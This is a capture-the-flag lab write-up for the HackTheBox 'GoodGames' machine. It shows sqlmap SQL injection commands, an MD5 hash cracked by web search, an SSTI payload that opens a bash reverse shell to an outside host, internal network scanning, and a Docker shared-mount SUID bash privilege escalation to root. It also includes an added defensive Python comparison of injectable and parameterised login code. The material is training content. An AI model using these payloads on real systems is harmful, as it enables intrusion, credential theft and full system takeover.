
HackTheBox GoodGames Writeup

Explore the fundamentals of cybersecurity in the GoodGames Capture The Flag (CTF) challenge, an easy-level box. This straightforward CTF writeup walks through the key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.11.130 goodgames.htb internal-administration.goodgames.htb

Script to add hosts automatically

ip="10.10.11.130"
domain="goodgames.htb internal-administration.goodgames.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV goodgames.htb

Nmap scan report for goodgames.htb (10.10.11.130)
Host is up (0.053s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.9.2)
|_http-title: GoodGames | Community and Store
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2

Exploiting GoodGames HTB

  1. Register on http://goodgames.htb/signup.

  2. Intercept the login request and begin testing for SQL injection with sqlmap:

sqlmap -u "http://goodgames.htb/login" \
  --data="email=1&password=a@a.com" \
  --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0" \
  --referer="http://goodgames.htb/signup" \
  -p email --batch --dbms="MySQL" --level=5 --risk=3 --threads 10

  3. List databases with sqlmap:

sqlmap -u "http://goodgames.htb/login" \
  --data="email=1&password=a@a.com" \
  --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0" \
  --referer="http://goodgames.htb/signup" \
  -p email --batch --dbms="MySQL" --level=5 --risk=3 --threads 10 --dbs

  4. Dump the main database:

sqlmap -u "http://goodgames.htb/login" \
  --data="email=1&password=a@a.com" \
  --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0" \
  --referer="http://goodgames.htb/signup" \
  -p email --batch --dbms="MySQL" --level=5 --risk=3 --threads 10 -D main --dump

Searching the Hash

  • Search for the hash 2b22337f218b2d82dfc3b6f77e7cb8ec on Google, which reveals the password.
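The two weaknesses the sqlmap steps and the hash search above rely on, as an added example that is not part of the original writeup: a login query built with string formatting next to a parameterised one, and an unsalted MD5 password hash (the kind a search engine can resolve) next to salted PBKDF2 with a constant-time comparison. The table, the sample account and the use of sqlite3 in place of the target's MySQL backend are constructed for this demonstration.

```python
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 200_000  # PBKDF2 work factor; tune for your hardware


def hash_password(password: str, salt: bytes = b"") -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as 'salthex$digesthex'."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"{salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(digest.hex(), digest_hex)


# Constructed sample data: sqlite3 stands in for the target's MySQL backend.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE users (id INTEGER, email TEXT, md5_hash TEXT, pbkdf2_hash TEXT)")
DB.execute(
    "INSERT INTO users VALUES (1, ?, ?, ?)",
    (
        "admin@goodgames.htb",
        hashlib.md5(b"superadministrator").hexdigest(),  # unsalted, fast: trivially looked up
        hash_password("superadministrator"),
    ),
)


def login_vulnerable(email: str, password: str):
    """Query built with an f-string: the email field becomes part of the SQL text."""
    md5 = hashlib.md5(password.encode()).hexdigest()
    sql = f"SELECT id, email FROM users WHERE email = '{email}' AND md5_hash = '{md5}'"
    return DB.execute(sql).fetchone()


def login_safe(email: str, password: str):
    """Bound parameter for the lookup, then the salted hash is checked in application code."""
    row = DB.execute("SELECT id, email, pbkdf2_hash FROM users WHERE email = ?", (email,)).fetchone()
    if row is None or not verify_password(password, row[2]):
        return None
    return row[:2]
```

Feeding a textbook tautology such as `' OR 1=1 -- ` into the email field logs the first account in through `login_vulnerable`, while `login_safe` treats it as a literal address and finds nothing.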

Logging into Internal Admin Panel

  1. Log in to http://internal-administration.goodgames.htb/login.

    Credentials:

    • admin:superadministrator
  2. The interesting page is http://internal-administration.goodgames.htb/settings.

Exploit SSTI for Reverse Shell

  1. Change the username, capture the request, and modify it to execute the reverse shell:

{{ namespace.__init__.__globals__.os.popen('bash+-c+"bash+-i+>%26+/dev/tcp/10.10.14.10/9001+0>%261"').read() }}

  2. Upgrade to a better shell using the following method:

script /dev/null -c bash

  3. Send the shell to the foreground:

Press Ctrl + Z to background the shell, then run:

stty raw -echo; fg

Gaining Access

  1. Access user.txt:

cat /home/augustus/user.txt

  2. Copy bash to your home directory:

cp /bin/bash /home/augustus

  3. Check if you’re inside a Docker container by looking for .dockerenv:

ls -a /

Network Exploration

  1. Ping sweep to find hosts:

for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

  2. Check for open ports on the discovered host (example 172.19.0.1):

for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null

  3. SSH into the discovered host, copy bash into the home directory (which is shared with the container), and return:

ssh augustus@172.19.0.1
cp /bin/bash /home/augustus
exit

Privilege Escalation

  1. Back in the container (as root), make the copied bash owned by root and SUID; because the home directory is a shared mount, the change applies on the host too:

chown root:root /home/augustus/bash
chmod 4777 /home/augustus/bash

  2. Log in again via SSH:

ssh augustus@172.19.0.1

  3. Run the SUID bash with -p so it keeps the root effective UID:

./bash -p

  4. Read root.txt:

cat /root/root.txt

This post is licensed under CC BY 4.0 by the author.